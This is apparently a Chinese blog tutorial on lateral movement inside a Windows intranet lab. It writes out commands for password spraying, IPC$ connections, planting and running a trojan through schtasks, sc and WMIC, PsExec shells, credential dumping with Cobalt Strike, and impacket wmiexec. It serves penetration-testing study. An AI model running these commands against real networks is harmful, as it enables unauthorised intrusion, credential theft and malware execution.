简单的内网横向移动

一.内网横向移动

在内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器

二.横向移动

1.密码喷洒

在通过一台机器的网站漏洞打进机器后,进行密码获取,获取到密码后,进行密码喷洒,在内网中,用户密码一样这件事情是经常存在的,所以可以利用已经获得的密码,对其他机器进行密码喷洒

2.ipc

ipc是共享命名管道的资源,是为了让进程之间进行通信的一种命名管道,只要提供连接的用户和口令,即可在双方之间建立安全的通道,利用ipc,连接者可以对目标主机实现目录的读取以及文件的上传等。

        a.利用条件

        目标开放139(netbios协议),445(文件和打印机共享)端口,手工利用需要都开启

        目标开启ipc$文件共享服务及默认共享

        目标管理员账号密码

        b.连接

        采用win7连接server08(只有administrator用户才可以建立net use连接)

net use \\192.168.8.130\ipc$ /user:administrator "wz1314521."  ————连接目标
net use  ————查看连接

67d4ce069df245869bd824e3df961798.png然后可以通过ipc$对目标进行上传木马,但是net use并不能执行文件,但是放到开机自启动是一种方法

ac2ce539cb2e443b8441706069dc7a86.png

查看server08 C盘,成功

edfe09ea3e0e432daabd1614c82bc909.png

2.ipc+计划任务

老版计划任务AT在server 2012以后已经被弃用所以需要使用schtasks

先通过ipc将木马传入目标机器,再给其创建计划任务

schtasks /create /s 192.168.8.133 /u administrator /p "wz1314521." /sc MINUTE /mo 1 /tn test /tr "c:\LOL.exe"

d31f528cb6f34e9e87933de075b5465a.png

创建成功,成功上线,删掉计划任务后,msf依旧不会掉线

cadcb9b301c6486a983d4642863b957b.png

schtasks /delete /tn test /s 192.168.8.133 /u administrator /p wz1314521.

9d955bceeebb4d8cb194ce0e75925374.png

3.ipc+sc

sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,则终止服务,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。

sc \\192.168.8.133 create test binpath= "c:\LOL.exe" password= wz1314521. --创建test服务

sc \\192.168.8.133 start test --启动test服务

sc \\192.168.8.133 stop test  --停止服务

3fa47056eb164f2ca36caa4835683bb9.png

507a10b2b91d49a6b7cc3ec7c2286fea.png

4.WMIC

windows管理规范,允许一台计算机远程管理另一台计算机,要求开启135和445端口,weindows,默认开启而且自带WMIC,他不支持命令,而是支持执行文件,但是可以利用他执行cmd,再执行命令

wmic /node:192.168.8.133 /user:administrator /password:wz1314521. process call create "cmd.exe /c start C:\LOL.exe"

c7770a1715b14ee793b6f46a63a71b8e.png

064154a9f71b42beb73704054fc9c445.png

5.psexex

PsExec的基本原理:

  • 1. 通过ipc$连接,释放二进制文件psexecsvc.exe到目标

  • 2. 通过服务管理SCManager远程创建一个psexec服务,并启动服务

  • 3. 客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据

  • 4. 运行结束后删除服务

使用ms的psexec

win7先上线b61cf0820f4b4019844c70ec3c8ba061.png

使用模块psexec并配置

a666622948424a6c9d8d59fb8980cea3.png

使用之后,成功移动

70acb65662b44c7a9e36da98764d89bd.png

利用微软提供的psexec.exe

将下载好的psexec.exe传入win7

PsExec.exe -accepteula \\192.168.8.133 -u administrator -p wz1314521. -s cmd.exe

-accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框
-u:用户名
-p:密码
-s:以system权限运行运程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个连接所用用户权限的shell

连接成功

dcab593a87f74e029a4d55263cd17155.png

6.cs

进入cs,创建两个监听,一个反向连接攻击机的监听,一个准备横向移动到win server 08的正向监听,上线win7后,用cs自己的存活扫描,扫描到win server 08,于是进行横向移动

win7上线后先hashdump和logonpasswords获取明文密码和hash

02cb1cf1d6df4bd391d4d036d95e8b86.png

155e44b8575842b3965c95361dcccc84.png

08724608bf264e41a0554f185ca8dd8a.png

23be3d46eb61435481a881ca601bcd78.png

成功

7.impacket的wmiexec

GitHub - maaaaz/impacket-examples-windows: The great impacket example scripts compiled for Windows

wmiexec.exe administrator:Liu78963@192.168.183.130
//wmiexec.py 用户名:密码@目标IP

5bca40764aba46e7af63b365d29e533d.png

.py同上述用法一样

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值